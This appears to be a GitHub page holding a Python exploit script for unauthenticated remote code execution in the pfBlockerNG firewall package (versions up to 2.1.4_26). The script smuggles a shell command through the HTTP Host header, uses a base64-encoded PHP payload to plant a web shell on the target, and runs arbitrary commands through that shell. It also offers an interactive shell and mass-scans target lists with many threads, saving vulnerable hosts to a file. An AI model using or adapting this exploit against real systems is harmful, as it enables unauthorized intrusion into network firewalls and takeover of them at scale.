-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
118 lines (98 loc) · 4.88 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
#!/usr/bin/env python3
import os
import argparse
import requests
import concurrent.futures
from rich.console import Console
from requests.packages import urllib3
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
urllib3.disable_warnings()
console = Console()
def fix_url(url):
if not "://" in url:
url = 'https://' + url.strip()
return url
def check_endpoint(url, silent=True):
response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)
if not silent:
if response.status_code == 200:
console.print("[bold green][+] pfBlockerNG is installed")
else:
console.print("[bold red][X] pfBlockerNG not installed")
return response.status_code
def upload_shell(url, command, silent=True):
payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
console.print("[bold yellow][!] Uploading shell...") if not silent else None
response = requests.get(f'{url}/pfblockerng/www/index.php', headers=payload, verify=False, timeout=3)
response = requests.get(f'{url}/system_advanced_control.php?c=echo "Pwned";{command}', verify=False, timeout=3)
if 'Pwned' in str(response.content, 'utf-8'):
console.print(f"[bold green][+] Host {url} is vulnerable ! [cyan]{str(response.text)}")
mass_result.append(f"{url.strip()}")
if not silent:
list_choice = ["Y",'y','']
console.print("[bold yellow][!] Do you want an interactive shell ? [[bold green]Y[/bold green]/[bold red]n[/bold red]]: ")
choice = console.input("[bold cyan]>>> [/bold cyan]")
if choice.lower() in list_choice:
interactive_shell(url, silent)
else:
console.print("[bold yellow][!] Bye Bye !!!")
delete_shell(url, silent)
else:
delete_shell(url)
else:
console.print("[bold red][x] Error uploading shell. Probably patched ", response.content) if not silent else None
def interactive_shell(url, silent):
try:
session = PromptSession(history=InMemoryHistory())
while True:
cmd = session.prompt(HTML('<ansired><b># </b></ansired>'))
if "exit" in cmd:
console.print("[bold yellow][!] Bye Bye !")
break
if "clear" in cmd:
if os.name == 'posix':
os.system('clear')
elif os.name == 'nt':
os.system('cls')
response = requests.get(f'{url}/system_advanced_control.php?c={cmd}', verify=False, timeout=3)
console.print(f"[bold green]{str(response.text)}")
except KeyboardInterrupt:
console.print("[bold][yellow][!] Exited shell, deleting[/bold][/yellow]")
delete_shell(url, silent)
def delete_shell(url, silent=True):
delcmd = "rm /usr/local/www/system_advanced_control.php"
requests.get(f'{url}/system_advanced_control.php?c={delcmd}', verify=False, timeout=3)
console.print("[bold green][+] Shell deleted") if not silent else None
def exploit(url, command, silent=True):
if check_endpoint(url, silent):
upload_shell(url, command, silent)
def main():
parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")
parser.add_argument("-c", "--command", dest="command", type=str, default="id", help="Console Command ('id')")
parser.add_argument("-l", "--list", dest="list", type=str, help="List of targets (list.txt)")
parser.add_argument("-i", "--ip", dest="ip", type=str, help="Base target uri (ex. http://target-uri/)")
parser.add_argument("-t", "--threads", default=50, type=int, help="Number of threads for mass scan")
parser.add_argument("-o", "--output", dest="output",type=str, help="Output file (vuln.txt)")
args = parser.parse_args()
global mass_result
mass_result = list()
if args.ip and not args.list:
exploit(args.ip, args.command, silent=False)
elif args.list:
with open(args.list, "r") as f:
hosts = f.readlines()
hosts = list(dict.fromkeys(hosts))
with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as pool, console.status("[bold purple]Hacking The Planet",spinner="earth"):
futures = [pool.submit(exploit, host.strip(), args.command) for host in hosts]
concurrent.futures.wait(futures)
else:
parser.print_help()
if args.output and not args.ip:
with open(args.output, "w") as f:
for host in mass_result:
f.write(f"{host}\n")
console.print(f"\n[bold yellow][!] Vulnerable targets ({len(mass_result)}/{len(hosts)}) stored in {args.output}")
if __name__ == '__main__':
main()